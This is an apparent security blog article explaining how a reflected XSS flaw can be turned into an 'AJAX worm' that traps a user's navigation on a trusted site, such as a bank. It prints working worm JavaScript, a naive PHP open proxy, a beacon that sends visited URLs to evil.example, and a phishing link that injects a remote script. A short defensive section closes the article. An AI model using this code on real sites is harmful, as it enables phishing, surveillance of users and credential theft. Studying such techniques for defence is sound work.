One Step from a Passive XSS Vulnerability to an AJAX Worm

    I often run into the opinion that a passive XSS vulnerability poses no real danger and is not worth worrying about. And while this is partly true (compared with other, more catastrophic bugs), the ability to embed your own code into a vulnerable site, even if it takes considerable extra effort to deceive the user, can lead to serious consequences, in particular to the complete interception of the user's further actions.

    What is an AJAX Worm?


    An AJAX worm is JavaScript code that modifies the links on the page hosting it so that, when the user clicks them, he remains in the context of the current page, with AJAX requests replacing full navigation. In the simplest variant it takes only a few lines and works as follows.

    1. Collect all the links on the page.
    2. Attach its own click handler to each of them.
    3. On a click, perform an AJAX request to the address of the clicked link.
    4. Replace the page content with the result obtained in step 3.
    5. Infect the links in the new content.

    Clearly this is a very simplified scenario: a full-fledged “combat” worm would also take care of correctly updating the page title and the CSS and JS files linked in the header, and would use URL spoofing in those browsers where it is possible. But even the simplest variant, which dumps the received data straight into the body element, is fully functional. An implementation example:
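
    A minimal sketch of the five steps above (the function name infect is mine, not taken from any particular worm); it assumes the fetched pages are same-origin, a limitation the digression below addresses:

        // A naive sketch of the five steps above. Hypothetical helper name.
        function infect(root) {
            // 1. Collect every link in the given subtree.
            var links = root.getElementsByTagName('a');
            for (var i = 0; i < links.length; i++) {
                // 2. Attach our own click handler to each link.
                links[i].onclick = function () {
                    var url = this.href;
                    // 3. Fetch the target of the clicked link with AJAX.
                    var xhr = new XMLHttpRequest();
                    xhr.onreadystatechange = function () {
                        if (xhr.readyState === 4 && xhr.status === 200) {
                            // 4. Replace the page content with the result.
                            document.body.innerHTML = xhr.responseText;
                            // 5. Infect the links of the new content.
                            infect(document.body);
                        }
                    };
                    xhr.open('GET', url, true);
                    xhr.send(null);
                    return false; // suppress the real navigation
                };
            }
        }
        infect(document);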

    A small digression: if a browser could fetch the code of an arbitrary page on the network, the security problem would be far more serious; fortunately, all modern browsers forbid cross-site requests. This restriction can be circumvented, however, by sending the requests to an intermediate application that lives on the same domain as the page with the worm and acts as a content downloader.
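
    On the worm side this changes only the request line: assuming the intermediate script sits at a hypothetical proxy.php on the same domain, step 3 of the sketch becomes:

        // Ask the same-domain proxy to fetch the foreign URL on our behalf,
        // since a direct cross-site request would be blocked by the browser.
        xhr.open('GET', 'proxy.php?url=' + encodeURIComponent(url), true);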


    In the simplest case this application is a single line of PHP. A combat version should, at the very least, cache the downloaded data so that the client never pays for fetching the same content twice, and in the ideal case also support receiving and forwarding cookies and route its requests through a set of proxies, so that one and the same IP does not show up in the logs too often.
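
    For illustration, a one-line sketch of such a downloader, deliberately naive: no caching, no validation, it blindly fetches whatever the url parameter names:

        <?php echo file_get_contents($_GET['url']);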

    Even in this simplest version we get an infected page that lets the user "navigate" the web while actually staying on a single page, and, if desired, lets us log his movements and the data he enters. Of course, if the user notices that the page address magically never changes, or that the status bar keeps showing requests to an unfamiliar domain, he may sound the alarm right away; but we are smart, and the average user may well overlook it.
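
    The logging itself can be as primitive as an image beacon fired from the click handler; evil.example stands in here for the attacker's hypothetical collector:

        // Report each intercepted navigation to the attacker's collector.
        function report(url) {
            new Image().src = 'http://evil.example/log?visited=' +
                encodeURIComponent(url);
        }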

    Although this method allows plenty of dirty tricks, it takes too much effort to lure a person onto the trap page in the first place, not to mention that such a page will very quickly land in all kinds of browser blacklists. But what if the trap turns out to be someone else's page, completely safe at first glance, on a domain familiar to the user? This is where the ability to embed your code through an XSS vulnerability on another site enters the fray.

    Imagine a smart attacker running a phishing attack against a bank's users. He does not need to build any fake sites: it is enough to put a link to the vulnerable page of the bank's site in the letter, and the user, sure that he is going to a trusted domain, ends up in the infected zone. Nor does it matter that the vulnerable page is, say, the site search: JavaScript can modify the content arbitrarily, which means the user can be shown the index or any other page.
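
    A hypothetical example of such a link, assuming a reflected XSS in the search parameter of the bank's site (in a real letter the payload would of course be URL-encoded):

        http://bank.example/search?q=<script src="http://evil.example/worm.js"></script>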

    Better still, the attacker can do without the intermediate layer for fetching data entirely, because the requested pages live on the same domain and can therefore be obtained by a direct AJAX request. Alternatively, he can route traffic through the same vulnerable page to make the infection less visible: in that case real transitions between pages take place, and the target link can be encoded, for example, as an anchor in the URL.
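
    A minimal sketch of the anchor variant, where link stands for each anchor processed by the infect loop above: every click triggers a genuine reload of the infected page, with the true destination smuggled in the URL fragment:

        // In the click handler: put the real target into the fragment and
        // force a real page load; the server re-injects the worm on reload.
        link.onclick = function () {
            location.hash = encodeURIComponent(this.href);
            location.reload();
            return false;
        };

        // On load: if a target is hidden in the fragment, fetch it with a
        // direct same-domain request (no proxy needed) and render it.
        if (location.hash) {
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function () {
                if (xhr.readyState === 4 && xhr.status === 200) {
                    document.body.innerHTML = xhr.responseText;
                }
            };
            xhr.open('GET', decodeURIComponent(location.hash.substring(1)), true);
            xhr.send(null);
        }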



    And what can be done about all this?


    Prevent XSS vulnerabilities in the first place: manual and automated testing, plus the use of frameworks with a correct policy of escaping data that comes from outside.
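
    For instance, in PHP the escaping boils down to passing every external value through the standard htmlspecialchars function before it reaches the page; a minimal illustration for the search scenario above:

        <?php
        // Render externally supplied data as text, never as markup.
        $q = isset($_GET['q']) ? $_GET['q'] : '';
        echo '<p>Results for: ' . htmlspecialchars($q, ENT_QUOTES, 'UTF-8') . '</p>';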

    From the moment the attacker has injected his code into a page of the site, we have lost control completely: any protective scripts can be cut out of the code, and the data the user enters can be shipped off to a third-party server. The only half-measure is a fixed login-form page combined with a check of the referrer and IP address on the script that receives the credentials, which at least keeps the attacker from getting into the system automatically. It will not, however, stop him from using the stolen data by hand.
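
    A rough sketch of that half-measure, assuming a form page that stored the visitor's IP in the session when it was shown; bank.example and the path are hypothetical names:

        <?php
        session_start();
        // Reject the POST unless it came from our fixed login page and from
        // the same IP address that the form was served to.
        $referer  = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
        $fromForm = strpos($referer, 'https://bank.example/login.php') === 0;
        $sameIp   = isset($_SESSION['form_ip'])
            && $_SESSION['form_ip'] === $_SERVER['REMOTE_ADDR'];
        if (!$fromForm || !$sameIp) {
            header('HTTP/1.1 403 Forbidden');
            exit;
        }
        // ...normal credential verification continues here...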
